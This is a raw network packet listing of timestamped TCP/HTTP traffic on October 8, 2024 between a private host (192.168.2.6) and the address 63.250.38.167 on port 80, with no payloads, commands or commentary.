Oct 8, 2024 11:30:27.277194023 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.277194023 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.277244091 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.282036066 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.282047033 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.282058001 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.282068014 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.282109976 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.282155991 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.282280922 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.367558002 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.367629051 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.367664099 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.367675066 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.367685080 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.367697954 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.367721081 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.367877007 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.367897034 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.367904902 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.367913961 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.367969990 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.368272066 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.368289948 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.368299961 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.368325949 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.368534088 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.368544102 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.368592024 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.368592024 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.368949890 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.368982077 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.368993044 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.369054079 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.369062901 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.369075060 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.369082928 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.369108915 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.369134903 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.372586966 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.372603893 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.372616053 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.372627020 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.372637987 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.372648954 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.372664928 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.372709990 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.457984924 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.457995892 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458050966 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.458087921 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458097935 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458112955 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458122969 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458142042 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458151102 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458163023 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458170891 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458180904 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458190918 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.458190918 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.458192110 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.458225965 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.458611965 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458708048 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458709955 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.458717108 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458729029 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458739042 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458762884 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.458786011 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.458888054 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458898067 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458904028 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458956957 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458966017 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.458976984 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.459005117 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.459005117 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.459343910 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.459351063 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.459364891 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.459393978 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.459403992 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.459414005 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.459424019 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.459424019 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.459434986 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.459470034 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.459495068 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.459522963 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.459532976 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.459543943 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.459549904 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.459559917 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.459568024 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.459572077 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.459606886 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.460083008 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.460261106 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.460378885 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.460388899 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.460398912 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.460408926 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.460418940 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.460427046 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.460428953 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.460428953 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.460445881 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.460460901 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.460472107 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.460481882 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.460494041 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.460501909 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.460501909 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.460501909 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.460509062 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.460525990 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.460575104 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.461225986 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.461294889 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.463012934 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.463176012 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.548713923 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.548814058 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.548815966 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.548824072 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.548849106 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.548857927 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.548868895 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.548877954 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.548894882 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.548894882 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.548904896 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.548913002 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.548918009 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.548938990 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.548949957 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.548959970 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.548969984 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549000025 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.549000025 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.549005032 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549016953 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549025059 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.549026012 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549037933 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549047947 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549336910 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549386978 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.549386978 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.549386978 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.549421072 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549432039 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549443007 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549453020 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549463987 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549468994 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.549763918 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549803019 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.549803019 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.549880981 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549890995 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549901962 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549911022 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549921989 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549932957 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549936056 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.549943924 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549953938 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.549957037 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.549976110 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.549999952 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.550162077 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.550247908 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.550259113 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.550270081 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.550280094 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.550293922 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.550308943 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.550308943 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.550345898 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.550384045 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.550395012 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.550404072 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.550414085 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.550424099 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.550434113 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.550441980 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.550446987 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.550457954 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.550466061 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.550468922 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.550481081 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.550528049 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.550528049 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.550529003 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.551912069 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.552109003 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.552119970 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.552131891 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.552144051 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.552155018 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.552158117 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.552165985 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.552182913 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.552189112 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.552191973 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.552200079 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.552212000 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.552222967 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.552232981 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.552243948 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.552254915 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.552277088 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.552277088 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.552277088 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.552323103 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.553770065 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.553781033 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.553911924 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.553960085 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.553960085 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.553972960 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.553985119 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.554090977 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.554116964 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.554127932 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.554137945 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.554150105 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.554161072 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.554171085 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.554182053 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.554192066 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.554203987 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.554212093 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.554212093 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.554217100 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.554225922 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.554270983 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.554637909 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.554650068 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.554658890 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.555119038 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.589612961 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.589622974 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.589639902 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.589648962 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.589716911 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.589716911 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640047073 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640108109 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640140057 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640155077 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640206099 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640214920 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640228987 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640230894 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640239954 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640252113 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640261889 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640261889 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640275955 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640336037 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640336037 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640376091 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640387058 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640396118 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640412092 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640420914 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640436888 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640446901 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640455961 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640460014 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640460014 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640466928 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640472889 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640477896 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640487909 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640499115 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640510082 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640521049 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640531063 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640537024 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640542030 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640554905 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640578032 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640578032 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640588999 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640599012 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640608072 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640623093 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640631914 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640631914 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640634060 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640645027 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640652895 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640655994 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640667915 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640676975 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640696049 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640707016 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640717030 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640726089 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640736103 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640746117 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640746117 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640746117 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640747070 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640758991 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640769958 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640772104 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640772104 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640811920 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640840054 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640850067 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640858889 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640867949 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640877962 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640887022 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640901089 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640901089 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640903950 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640914917 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640924931 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640933990 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640937090 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640947104 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640950918 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640963078 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640971899 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640980959 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.640990973 CEST	80	49794	63.250.38.167	192.168.2.6
